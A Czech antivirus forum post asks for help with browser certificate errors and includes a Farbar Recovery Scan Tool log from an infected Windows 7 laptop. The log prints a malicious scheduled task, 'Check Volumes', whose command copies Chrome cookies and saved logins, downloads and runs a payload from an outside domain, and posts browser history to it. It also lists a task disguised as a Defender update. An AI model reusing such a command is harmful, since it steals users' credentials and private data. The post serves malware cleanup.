VIRY.CZ

Pomáháme v boji s počítačovou havěti!
https://forum.viry.cz:443/

neplatné certifikaty v prohližečích

https://forum.viry.cz:443/viewtopic.php?t=158322

Stránka 1 z 1

neplatné certifikaty v prohližečích

Napsal: 26 říj 2021 16:05
od Eddydye
Prosím o kontrolu logu, hlásí to neplatné certifikáty v prohlížečích, někdy hodí že není připojení k internetu a když se prohlížeč vypne a zapne, naskočí tabulka že proces využívá jiná aplikace ale v procesech nic není.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-10-2021
Ran by PC (administrator) on PC-PC (ASUSTeK Computer Inc. K50IJ) (26-10-2021 16:54:41)
Running from C:\Users\PC\Desktop
Loaded Profiles: PC
Platform: Microsoft Windows 7 Home Premium (X64) Language: Čeština (Česká republika)
Default browser: IE
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe
() [File not signed] C:\Program Files\ATKGFNEX\GFNEXSrv.exe
() [File not signed] C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe
(AlcorMicro Co., Ltd.) [File not signed] C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(ASUS) [File not signed] C:\Program Files (x86)\ASUS\ATK Media\DMedia.exe
(ASUSTeK Computer Inc. -> ) C:\Program Files (x86)\ASUS\ATK Hotkey\Atouch64.exe
(ASUSTeK Computer Inc. -> ) C:\Program Files (x86)\ASUS\ControlDeck\ControlDeckStartUp.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ASUS CopyProtect\ASPG.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\AsLdrSrv.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\ATKOSD.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\HControl.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\HControlUser.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\KBFiltr.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\WDC.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATKOSD2\ATKOSD2.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\SmartLogon\sensorsrv.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\SmartLogon\smartlogon.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Windows\AsScrPro.exe
(ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Windows\System32\FBAgent.exe
(ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Windows\SysWOW64\Fast Boot\FastBootAgent.exe
(ASUSTeK Computer Inc. -> ATK) C:\Program Files\P4G\BatteryLife.exe
(ASUSTeK) [File not signed] C:\Windows\SysWOW64\ACEngSvr.exe
(ATK) [File not signed] C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
(CyberLink -> CyberLink) C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvc.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronic Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Google LLC -> Google LLC) [File not signed] C:\Program Files\Google\Chrome\Application\chrome.exe <29>
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Rezhabeck) [File not signed] C:\Program Files (x86)\MachinerData\main.exe
(Rezhabeck) [File not signed] C:\Program Files (x86)\MachinerData\mp3RenamerPro.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\BM\TMBMSRV.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\SfCtlCom.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\TmProxy.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe
(VIA) [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDECK.EXE

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [UfSeAgnt.exe] => C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe [1022368 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [320000 2009-04-09] (AlcorMicro Co., Ltd.) [File not signed]
HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [619392 2009-06-12] (ELAN Microelectronics Corporation -> ELAN Microelectronic Corp.)
HKLM-x32\...\Run: [UpdateLBPShortCut] => C:\Program Files (x86)\CyberLink\LabelPrint\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink -> CyberLink Corp.)
HKLM-x32\...\Run: [UpdateP2GoShortCut] => C:\Program Files (x86)\CyberLink\Power2Go\MUITransfer\MUIStartMenu.exe [218408 2008-12-04] (CyberLink -> CyberLink Corp.)
HKLM-x32\...\Run: [HDAudDeck] => C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe [2244096 2009-07-13] (VIA) [File not signed]
HKLM-x32\...\Run: [HControlUser] => C:\Program Files (x86)\ASUS\ATK Hotkey\HControlUser.exe [105016 2009-06-19] (ASUSTeK Computer Inc. -> ASUS)
HKLM-x32\...\Run: [ATKOSD2] => C:\Program Files (x86)\ASUS\ATKOSD2\ATKOSD2.exe [8493624 2009-07-07] (ASUSTeK Computer Inc. -> ASUS)
HKLM-x32\...\Run: [ATKMEDIA] => C:\Program Files (x86)\ASUS\ATK Media\DMedia.exe [159744 2009-04-20] (ASUS) [File not signed]
HKLM-x32\...\Run: [Setwallpaper] => c:\programdata\SetWallpaper.cmd
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\...\Run: [Google Update] => C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\GoogleUpdateCore.exe [223816 2021-10-11] (Google LLC -> Google LLC)
HKLM\...\Windows x64\Print Processors\Canon MP250 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPD9W.DLL [28672 2010-04-24] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor MP250 series: C:\Windows\system32\CNMLM9W.DLL [336896 2010-04-24] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\95.0.4638.54\Installer\chrmstp.exe [2021-10-25] (Google LLC -> Google LLC) [File not signed]
HKLM\Software\...\Authentication\Credential Providers: [{06FE45A8-6D92-44ba-A0F1-9A9BCDC8F5A7}] -> C:\Program Files (x86)\ASUS\SmartLogon\system\FaceCredentialProvider64.dll [2009-05-01] (ASUS) [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FancyStart daemon.lnk [2009-10-06]
ShortcutTarget: FancyStart daemon.lnk -> C:\Windows\Installer\{60D6618B-153F-4353-8185-908E676E5888}\_DCE9A4DB2A5F2786140FA3.exe () [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\tmchlang.lnk [2009-10-06]
ShortcutTarget: tmchlang.lnk -> C:\Program Files\Trend Micro\Internet Security\TmChLang.exe (Trend Micro, Inc. -> Trend Micro Inc.)
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {169201BA-EF95-4DBA-A040-93D29590C6AF} - System32\Tasks\ASUSControlDeck => C:\Program Files (x86)\ASUS\ControlDeck\ControlDeckStartUp.exe [17976 2009-07-23] (ASUSTeK Computer Inc. -> )
Task: {2C093763-EE42-49CF-8891-F189A4AB542C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {326F35B1-9030-43D1-BD0D-5DBD49CECAFF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
Task: {3BA45A0D-24F6-4688-84BE-D1EA203FDFE0} - System32\Tasks\WC3 => C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe [1593344 2009-07-24] () [File not signed]
Task: {4CDF81D0-F7E2-48C8-817A-A530B90DD8DF} - System32\Tasks\Microsoft Windows Defender Update => C:\Program Files (x86)\Rezhabeck\mp3RenamerPro\mp3RenamerPro.exe
Task: {6E64456A-0201-4D80-BB77-5184B428C4FA} - System32\Tasks\Check Volumes => C:\Windows\SYSTEM32\CMD.EXE /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Local State" "C:\Users\PC\AppData\Local\Temp\OEROW4YA69" > NUL && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION
Task: {74344F07-42C6-4622-9312-152A6B0AECFF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {7A61CC45-675A-42D9-BC0A-D3691F5842ED} - System32\Tasks\ASUS SmartLogon Console Sensor => C:\Program Files (x86)\ASUS\SmartLogon\sensorsrv.exe [305720 2009-05-19] (ASUSTeK Computer Inc. -> ASUS)
Task: {9EA161CC-94DA-40D4-AD7B-00389FB1DC3C} - System32\Tasks\ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [684544 2009-07-23] (ATK) [File not signed]
Task: {C02341A7-0F42-4050-B91B-7BBE20935F36} - System32\Tasks\ASUS Live Update => C:\Program Files (x86)\ASUS\ASUS Live Update\ALU.exe [51768 2007-11-30] (ASUSTeK Computer Inc. -> )
Task: {CA21A731-91AF-4714-8E6F-CFE619DD08A0} - System32\Tasks\Games\UpdateCheck_S-1-5-21-1878501408-2484808434-785971923-1000 => {CA22F5B1-E06F-4A2B-94FC-21E87FE53781} C:\Windows\System32\gameux.dll [2746368 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Task: {E24D73D5-BC2A-4F11-90B0-83E312366154} - System32\Tasks\ASUS P4G => C:\Program Files\P4G\BatteryLife.exe [267832 2009-07-29] (ASUSTeK Computer Inc. -> ATK)
Task: {F53D1F2C-4DBF-4EB4-9E7F-45350BE21FBF} - System32\Tasks\ASPG => C:\Program Files (x86)\ASUS\ASUS CopyProtect\aspg.exe [163384 2009-06-29] (ASUSTeK Computer Inc. -> ASUS)
Task: {FF6375C1-1AC9-466C-80D7-F1443D3F6986} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 78.157.167.7 78.157.167.57
Tcpip\..\Interfaces\{6FBAB886-4307-4726-B9CB-F48F3A217E2B}: [DhcpNameServer] 78.157.167.7 78.157.167.57

FireFox:
========
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll [No File]
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.3 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2008-11-13] (Microsoft Corporation -> Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8051.1204 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2008-12-04] (Microsoft Corporation -> Microsoft Corporation)

Chrome:
=======
CHR Profile: C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default [2021-10-26]
CHR Notifications: Default -> hxxps//tadesco.org
CHR Extension: (Prezentace) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-01-03]
CHR Extension: (Dokumenty) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2021-01-03]
CHR Extension: (Disk Google) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-01-03]
CHR Extension: (YouTube) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-01-03]
CHR Extension: (Tabulky) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-01-03]
CHR Extension: (Dokumenty Google offline) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-10-25]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Gmail) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-01-03]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ATKGFNEXSrv; C:\Program Files\ATKGFNEX\GFNEXSrv.exe [94208 2007-08-08] () [File not signed]
R2 FastBootAgent; C:\Windows\SysWOW64\Fast Boot\FastBootAgent.exe [306232 2009-07-24] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
S3 GoogleChromeElevationService; C:\Program Files\Google\Chrome\Application\95.0.4638.54\elevation_service.exe [1480024 2021-10-16] (Google LLC -> Google LLC) [File not signed]
R2 Main Service; C:\Program Files (x86)\MachinerData\mp3RenamerPro.exe [1683456 2021-07-05] (Rezhabeck) [File not signed]
R2 SfCtlCom; C:\Program Files\Trend Micro\Internet Security\SfCtlCom.exe [838528 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R2 SoundFlowPicker; C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe [1064960 2021-07-05] () [File not signed] <==== ATTENTION
R3 TMBMServer; C:\Program Files\Trend Micro\BM\TMBMSRV.exe [570632 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 TmProxy; C:\Program Files\Trend Micro\Internet Security\TmProxy.exe [917768 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ASMMAP64; C:\Program Files\ATKGFNEX\ASMMAP64.sys [14904 2007-07-24] (ASUSTeK Computer Inc. -> )
R3 athr; C:\Windows\System32\DRIVERS\athrx.sys [1394688 2009-06-20] (Microsoft Windows -> Atheros Communications, Inc.)
R3 ETD; C:\Windows\System32\DRIVERS\ETD.sys [112128 2009-06-12] (Microsoft Windows Hardware Compatibility Publisher -> ELAN Microelectronic Corp.)
R3 kbfiltr; C:\Windows\System32\DRIVERS\kbfiltr.sys [15416 2009-07-20] (ASUSTeK Computer Inc. -> )
R3 L1E; C:\Windows\System32\DRIVERS\L1E62x64.sys [55296 2009-06-09] (Microsoft Windows Hardware Compatibility Publisher -> Atheros Communications, Inc.)
R0 lullaby; C:\Windows\System32\DRIVERS\lullaby.sys [15928 2009-06-18] (ASUSTeK Computer Inc. -> Windows (R) Win 7 DDK provider)
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1806400 2009-06-05] (SONIX TECHNOLOGY CO. , LTD -> )
R3 tmpreflt; C:\Windows\System32\DRIVERS\tmpreflt.sys [42000 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R1 tmtdi; C:\Windows\System32\DRIVERS\tmtdi.sys [107536 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 tmxpflt; C:\Windows\System32\DRIVERS\tmxpflt.sys [258064 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 vsapint; C:\Windows\System32\DRIVERS\vsapint.sys [1883152 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
U3 tmlwf; no ImagePath
U3 tmwfp; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-26 16:52 - 2021-10-26 16:54 - 000000423 _____ C:\Users\PC\Desktop\Addition.txt
2021-10-26 16:47 - 2021-10-26 16:56 - 000017006 _____ C:\Users\PC\Desktop\FRST.txt
2021-10-26 16:47 - 2021-10-26 16:55 - 000000000 ____D C:\FRST
2021-10-26 16:42 - 2021-10-26 16:42 - 002310656 _____ (Farbar) C:\Users\PC\Desktop\FRST64.exe
2021-10-25 16:56 - 2021-10-25 16:56 - 000002244 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-10-25 16:56 - 2021-10-25 16:56 - 000002203 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-10-25 16:55 - 2021-10-25 16:55 - 000003388 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2021-10-25 16:55 - 2021-10-25 16:55 - 000003260 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2021-10-11 16:33 - 2021-10-11 16:33 - 001341272 _____ (Google LLC) C:\Users\PC\Downloads\ChromeSetup.exe

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-26 16:57 - 2021-08-05 15:40 - 000000824 _____ C:\Windows\system32\Drivers\etc\tmvsthfud.bin
2021-10-26 16:57 - 2021-08-05 15:40 - 000000824 _____ C:\Windows\system32\Drivers\etc\tmvsthfss.bin
2021-10-26 16:57 - 2021-07-13 16:04 - 000000004 _____ C:\ProgramData\rc.dat
2021-10-26 16:51 - 2021-07-13 16:03 - 000000004 _____ C:\ProgramData\lock.dat
2021-10-26 16:48 - 2009-07-14 06:45 - 000010016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2021-10-26 16:48 - 2009-07-14 06:45 - 000010016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2021-10-26 16:43 - 2021-01-03 19:43 - 000000000 ____D C:\Program Files (x86)\Google
2021-10-26 16:42 - 2021-07-13 16:03 - 000000056 _____ C:\ProgramData\lir.bats
2021-10-26 16:42 - 2009-10-06 11:33 - 000003004 _____ C:\Windows\system32\Tasks\ASUS Live Update
2021-10-26 16:41 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2021-10-26 16:38 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\system32\NDF
2021-10-25 17:06 - 2021-02-16 16:18 - 000002262 _____ C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-10-25 17:06 - 2021-02-16 16:18 - 000002203 _____ C:\Users\PC\Desktop\Google Chrome.lnk
2021-10-25 17:06 - 2009-10-06 11:35 - 000001145 _____ C:\Windows\system32\ServiceFilter.ini
2021-10-11 16:05 - 2021-02-16 16:16 - 000003558 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA
2021-10-11 16:05 - 2021-02-16 16:16 - 000003286 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core

==================== Files in the root of some directories ========

2021-07-13 16:03 - 2021-10-26 16:51 - 000000004 _____ () C:\ProgramData\lock.dat
2021-07-13 16:04 - 2021-10-26 16:57 - 000000004 _____ () C:\ProgramData\rc.dat
2021-07-13 16:03 - 2021-07-13 16:03 - 000000008 _____ () C:\ProgramData\ts.dat
2007-06-12 18:34 - 2007-06-12 18:34 - 000035822 _____ () C:\Program Files (x86)\Common Files\ASPG_icon.ico
2008-05-22 17:35 - 2008-05-22 17:35 - 000051962 _____ () C:\Program Files (x86)\Common Files\banner.jpg
2009-04-08 19:31 - 2009-04-08 19:31 - 000106496 _____ () C:\Program Files (x86)\Common Files\CPInstallAction.dll
2008-08-12 06:45 - 2008-08-12 06:45 - 000155648 _____ (ASUS) C:\Program Files (x86)\Common Files\MSIactionall.dll

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2021-03-31 16:37
==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-10-2021
Ran by PC (26-10-2021 16:58:02)
Running from C:\Users\PC\Desktop
Microsoft Windows 7 Home Premium (X64) (2021-01-03 17:28:21)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================


(If an entry is included in the fixlist, it will be removed.)

Administrator (S-1-5-21-1878501408-2484808434-785971923-500 - Administrator - Disabled)
Guest (S-1-5-21-1878501408-2484808434-785971923-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1878501408-2484808434-785971923-1002 - Limited - Enabled)
PC (S-1-5-21-1878501408-2484808434-785971923-1000 - Administrator - Enabled) => C:\Users\PC

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Trend Micro Internet Security (Enabled - Up to date) {48929DFC-7A52-A34F-8351-C4DBEDBD9C50}
AS: Trend Micro Internet Security (Enabled - Up to date) {F3F37C18-5C68-ACC1-B9E1-FFA9963AD6ED}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Activation Assistant for the 2007 Microsoft Office suites (HKLM-x32\...\Activation Assistant for the 2007 Microsoft Office suites) (Version: - Microsoft Corporation)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 10.0.32.18 - Adobe Systems Incorporated)
Adobe Flash Player 10 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 10.0.32.18 - Adobe Systems Incorporated)
Adobe Reader 9.1 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader (HKLM-x32\...\InstallShield_{5A22D889-FBDD-4AE8-86EC-089D45FC133E}) (Version: 1.2.17.25001 - Alcor Micro Corp.)
Asistent pro přihlášení ke službě Windows Live (HKLM-x32\...\{1E779810-ACCA-4483-BC76-12DFE055B452}) (Version: 5.000.817.1 - Microsoft Corporation)
ASUS AI Recovery (HKLM-x32\...\{06585B02-F20D-4AB2-9A64-86EF2AE0F8F0}) (Version: 1.0.6 - ASUS)
ASUS CopyProtect (HKLM-x32\...\{6B77A7F6-DD63-4F13-A6FF-83137A5AC354}) (Version: 1.0.0015 - ASUS)
ASUS FancyStart (HKLM-x32\...\{60D6618B-153F-4353-8185-908E676E5888}) (Version: 1.0.5 - ASUSTeK Computer Inc.)
ASUS LifeFrame3 (HKLM-x32\...\{1DBD1F12-ED93-49C0-A7CC-56CBDE488158}) (Version: 3.0.20 - ASUS)
ASUS Live Update (HKLM-x32\...\{E657B243-9AD4-4ECC-BE81-4CCF8D667FD0}) (Version: 2.5.9 - ASUS)
ASUS MultiFrame (HKLM-x32\...\{9D48531D-2135-49FC-BC29-ACCDA5396A76}) (Version: 1.0.0019 - ASUS)
ASUS Power4Gear Hybrid (HKLM\...\{1686C4D1-B1FD-42E8-B7A8-FB4C4DBA5BA8}) (Version: 1.1.19 - ASUS)
ASUS SmartLogon (HKLM-x32\...\{64452561-169F-4A36-A2FF-B5E118EC65F5}) (Version: 1.0.0007 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 1.02.0028 - ASUS)
ASUS Virtual Camera (HKLM-x32\...\{EC8BD21F-0CA0-4BBF-97D9-4A52B30041A1}) (Version: 1.0.17 - asus)
Asus_Camera_ScreenSaver (HKLM-x32\...\Asus_Camera_ScreenSaver) (Version: 2.0.0009 - ASUS)
Atheros Communications Inc.(R) AR8121/AR8113/AR8114 Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.16 - Atheros Communications Inc.)
ATK Generic Function Service (HKLM-x32\...\{D3D54F3E-C5C3-443D-978F-87A72E5616E8}) (Version: 1.00.0008 - ATK)
ATK Hotkey (HKLM-x32\...\{7C05592D-424B-46CB-B505-E0013E8E75C9}) (Version: 1.0.0051 - ASUS)
ATK Media (HKLM-x32\...\{D1E5870E-E3E5-4475-98A6-ADD614524ADF}) (Version: 2.0.0005 - ASUS)
ATKOSD2 (HKLM-x32\...\{3B05F2FB-745B-4012-ADF2-439F36B2E70B}) (Version: 7.0.0005 - ASUS)
Canon MP250 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MP250_series) (Version: - Canon Inc.)
ControlDeck (HKLM-x32\...\{5B65EF64-1DFA-414A-8C94-7BB726158E21}) (Version: 1.0.3 - ASUS)
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1720 - CyberLink Corp.)
CyberLink Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.2713 - CyberLink Corp.)
ETDWare PS/2-x64 7.0.5.5_WHQL (HKLM\...\Elantech) (Version: - )
Fast Boot (HKLM\...\{13F4A7F3-EABC-4261-AF6B-1317777F0755}) (Version: 1.0.3 - ASUS)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 95.0.4638.54 - Google LLC)
Google Chrome (HKU\S-1-5-21-1878501408-2484808434-785971923-1000\...\Google Chrome) (Version: 94.0.4606.81 - Google LLC)
Choice Guard (HKLM-x32\...\{8FFC5648-FAF8-43A3-BC8F-42BA1E275C4E}) (Version: 1.2.87.0 - Microsoft Corporation) Hidden
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: - Intel Corporation)
Junk Mail filter update (HKLM-x32\...\{4AB8B41B-3AF1-46BE-99B0-0ACD3B300C0A}) (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
